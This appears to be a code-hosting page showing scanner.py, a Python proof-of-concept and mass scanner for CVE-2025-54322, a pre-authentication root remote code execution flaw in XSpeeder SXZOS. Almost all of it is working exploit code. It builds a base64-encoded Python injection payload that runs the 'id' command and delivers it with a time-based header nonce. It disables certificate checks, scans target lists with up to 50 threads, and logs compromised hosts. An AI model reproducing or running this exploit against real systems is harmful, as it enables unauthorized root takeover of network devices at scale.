4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / scanner.py PY
#!/usr/bin/env python3
import requests
import sys
import time
import re
import urllib3
from base64 import b64encode
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import HTTPAdapter
from urllib3.exceptions import InsecureRequestWarning as URLLib3InsecureWarning
from concurrent.futures import ThreadPoolExecutor, as_completed
from threading import Lock
#By Chirag Artani
# Disable all SSL warnings
urllib3.disable_warnings(URLLib3InsecureWarning)
urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Thread-safe locks
print_lock = Lock()
file_lock = Lock()

def safe_print(message):
    """Thread-safe printing"""
    with print_lock:
        print(message)

def write_vulnerable(url, output, status):
    """Thread-safe file writing for vulnerable hosts"""
    with file_lock:
        with open('vuln-confirm.txt', 'a') as f:
            f.write(f"{url}\n")
            f.write(f"Status: {status}\n")
            f.write(f"Output: {output}\n")
            f.write("-"*70 + "\n")

class SSLAdapter(HTTPAdapter):
    """Custom adapter to handle SSL issues"""
    def init_poolmanager(self, *args, **kwargs):
        kwargs['ssl_version'] = urllib3.util.ssl_.PROTOCOL_TLS
        kwargs['cert_reqs'] = 'CERT_NONE'
        kwargs['assert_hostname'] = False
        return super().init_poolmanager(*args, **kwargs)

class XspeederScanner:
    def __init__(self, target_url, max_retries=2, thread_id=None):
        self.target_url = target_url.rstrip('/')
        self.max_retries = max_retries
        self.thread_id = thread_id
        self.session = self._create_session()
        # Regex to match uid/gid output from 'id' command
        self.id_regex = re.compile(r'uid=\d+\([a-zA-Z0-9_-]+\)\s+gid=\d+\([a-zA-Z0-9_-]+\)')

    def _create_session(self):
        """Create a requests session with SSL bypass"""
        session = requests.Session()

        # Mount custom SSL adapter for both HTTP and HTTPS
        adapter = SSLAdapter()
        session.mount('http://', adapter)
        session.mount('https://', adapter)

        # Set default headers
        session.headers.update({
            'Connection': 'close',
            'Accept': '*/*'
        })

        return session

    def build_payload(self):
        """Build the exploit payload with 'id' command - MATCHING ORIGINAL"""
        cmd = 'id'
        # Use os.system() like original PoC, but capture output
        payload = f'__import__("os").system("{cmd}") or __import__("subprocess").check_output("{cmd}", shell=True).decode() #sUserCodexsPwd'
        encoded_payload = b64encode(payload.encode()).decode("utf-8")
        return encoded_payload

    def calculate_nonce(self):
        """Calculate the time-based nonce for X-SXZ-R header"""
        return str(int(time.time() / 60) % 7)

    def warm_session(self, headers):
        """Warm up the session - MATCHING ORIGINAL (no validation)"""
        try:
            warmup_url = f"{self.target_url}/webInfos/"
            self.session.get(
                warmup_url,
                headers=headers,
                verify=False,
                timeout=20,
                allow_redirects=True
            )
            return True
        except requests.exceptions.Timeout:
            return True
        except Exception:
            return False

    def send_exploit(self, headers, payload):
        """Send the actual exploit request"""
        try:
            exploit_url = f"{self.target_url}/?title=ABC&oIp=XXX&chkid={payload}"
            response = self.session.get(
                exploit_url,
                headers=headers,
                verify=False,
                timeout=20,
                allow_redirects=False
            )
            return response
        except Exception:
            return None

    def check_vulnerability(self):
        """Main function to check if target is vulnerable"""
        for attempt in range(1, self.max_retries + 1):
            try:
                # Calculate fresh nonce for each attempt
                nonce = self.calculate_nonce()

                headers = {
                    'User-Agent': 'SXZ/2.3',
                    'X-SXZ-R': nonce,
                    'Accept': '*/*'
                }

                # Step 1: Warm up session
                if not self.warm_session(headers):
                    if attempt < self.max_retries:
                        time.sleep(1)
                        continue
                    return {
                        'vulnerable': False,
                        'status': 'Connection completely failed',
                        'output': None
                    }

                # Small delay between requests
                time.sleep(0.3)

                # Step 2: Send exploit
                payload = self.build_payload()
                response = self.send_exploit(headers, payload)

                if response is None:
                    if attempt < self.max_retries:
                        time.sleep(1)
                        continue
                    return {
                        'vulnerable': False,
                        'status': 'Exploit delivery failed',
                        'output': None
                    }

                # Check response for 'id' command output
                response_text = response.text

                # Look for uid/gid pattern in response
                id_match = self.id_regex.search(response_text)

                if id_match:
                    return {
                        'vulnerable': True,
                        'status': 'VULNERABLE - RCE Confirmed',
                        'output': id_match.group(0),
                        'status_code': response.status_code,
                        'full_response': response_text[:500]
                    }

                # Check for other indicators (partial match)
                if 'uid=' in response_text or 'gid=' in response_text:
                    return {
                        'vulnerable': True,
                        'status': 'LIKELY VULNERABLE - Partial match',
                        'output': response_text[:200],
                        'status_code': response.status_code
                    }

                # Check for error indicators that suggest code execution
                execution_indicators = [
                    'CalledProcessError',
                    'subprocess',
                    'Traceback',
                    'NameError',
                    'SyntaxError',
                    'eval'
                ]

                if any(indicator in response_text for indicator in execution_indicators):
                    return {
                        'vulnerable': True,
                        'status': 'POTENTIALLY VULNERABLE - Code execution indicators found',
                        'output': response_text[:300],
                        'status_code': response.status_code
                    }

                # If no match and we have retries left, try again
                if attempt < self.max_retries:
                    time.sleep(1)
                    continue

                return {
                    'vulnerable': False,
                    'status': 'Not vulnerable',
                    'output': None,
                    'status_code': response.status_code
                }

            except Exception as e:
                if attempt < self.max_retries:
                    time.sleep(1)
                    continue
                return {
                    'vulnerable': False,
                    'status': f'Error: {str(e)[:100]}',
                    'output': None
                }

        return {
            'vulnerable': False,
            'status': 'Max retries exceeded',
            'output': None
        }

def load_targets(filename):
    """Load targets from file"""
    try:
        with open(filename, 'r') as f:
            targets = [line.strip() for line in f if line.strip() and not line.startswith('#')]
        return targets
    except FileNotFoundError:
        print(f"[-] Error: File '{filename}' not found")
        sys.exit(1)
    except Exception as e:
        print(f"[-] Error reading file: {e}")
        sys.exit(1)

def scan_target(target, thread_id):
    """Scan a single target (thread worker function)"""
    scanner = XspeederScanner(target, max_retries=2, thread_id=thread_id)
    result = scanner.check_vulnerability()
    return target, result

def print_vulnerable(target, result):
    """Print only vulnerable results (thread-safe)"""
    output = []
    output.append(f"\n{'='*70}")
    output.append(f"[+] VULNERABLE: {target}")
    output.append(f"[+] Status: {result['status']}")
    if 'status_code' in result:
        output.append(f"[+] HTTP Status: {result['status_code']}")
    output.append(f"[+] Output: {result['output']}")
    output.append(f"{'='*70}\n")

    safe_print('\n'.join(output))

def main():
    banner = """
╔═══════════════════════════════════════════════════════════════╗
║     XSpeeder SXZOS (CVE-2025-54322) RCE Scanner              ║
║     Pre-Auth Root RCE Vulnerability Checker                   ║
║     Showing: VULNERABLE HOSTS ONLY                            ║
╚═══════════════════════════════════════════════════════════════╝
    """
    print(banner)

    if len(sys.argv) < 2 or len(sys.argv) > 3:
        print("[-] Usage: python3 scanner.py <targets_file> [threads]")
        print("[-] Example: python3 scanner.py targets.txt 20")
        print("[-] Default threads: 10")
        sys.exit(1)

    targets_file = sys.argv[1]
    max_threads = int(sys.argv[2]) if len(sys.argv) == 3 else 10

    # Validate thread count
    if max_threads < 1 or max_threads > 50:
        print("[-] Thread count must be between 1 and 50")
        sys.exit(1)

    targets = load_targets(targets_file)

    # Clear the output file
    with open('vuln-confirm.txt', 'w') as f:
        f.write(f"XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts\n")
        f.write(f"Scan started: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
        f.write("="*70 + "\n\n")

    print(f"[*] Loaded {len(targets)} targets from {targets_file}")
    print(f"[*] Using {max_threads} concurrent threads")
    print(f"[*] Vulnerable hosts will be saved to: vuln-confirm.txt")
    print(f"[*] Starting scan...\n")

    vulnerable_count = 0
    processed = 0
    start_time = time.time()

    # Threading with ThreadPoolExecutor
    with ThreadPoolExecutor(max_workers=max_threads) as executor:
        # Submit all tasks
        future_to_target = {
            executor.submit(scan_target, target, i): target
            for i, target in enumerate(targets, 1)
        }

        try:
            # Process completed tasks
            for future in as_completed(future_to_target):
                target = future_to_target[future]
                processed += 1

                try:
                    target_url, result = future.result()

                    # Only print and save if vulnerable
                    if result['vulnerable']:
                        vulnerable_count += 1
                        print_vulnerable(target_url, result)
                        write_vulnerable(target_url, result['output'], result['status'])

                    # Print progress every 50 hosts
                    if processed % 50 == 0:
                        safe_print(f"[*] Progress: {processed}/{len(targets)} | Found: {vulnerable_count} vulnerable")

                except Exception as e:
                    safe_print(f"[!] Error processing {target}: {e}")

        except KeyboardInterrupt:
            safe_print("\n\n[!] Scan interrupted by user. Waiting for active threads to finish...")
            executor.shutdown(wait=True)

    elapsed_time = time.time() - start_time

    # Final Summary
    print(f"\n{'='*70}")
    print(f"[*] SCAN COMPLETE")
    print(f"{'='*70}")
    print(f"[*] Total Time: {elapsed_time:.2f} seconds")
    print(f"[*] Total Targets Scanned: {len(targets)}")
    print(f"[*] Vulnerable Hosts Found: {vulnerable_count}")
    print(f"[*] Success Rate: {(vulnerable_count/len(targets)*100):.2f}%")
    print(f"[*] Average Time per Target: {elapsed_time/len(targets):.2f} seconds")
    print(f"{'='*70}\n")

    if vulnerable_count > 0:
        print(f"[+] All vulnerable hosts saved to: vuln-confirm.txt")
        print(f"[+] Total vulnerable: {vulnerable_count}/{len(targets)}")
    else:
        print(f"[-] No vulnerable hosts found")

    # Append summary to file
    with open('vuln-confirm.txt', 'a') as f:
        f.write("\n" + "="*70 + "\n")
        f.write(f"Scan completed: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
        f.write(f"Total scanned: {len(targets)}\n")
        f.write(f"Vulnerable: {vulnerable_count}\n")
        f.write(f"Time taken: {elapsed_time:.2f} seconds\n")

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\n\n[!] Script terminated by user")
        sys.exit(0)
    except Exception as e:
        print(f"\n[!] Fatal error: {e}")
        sys.exit(1)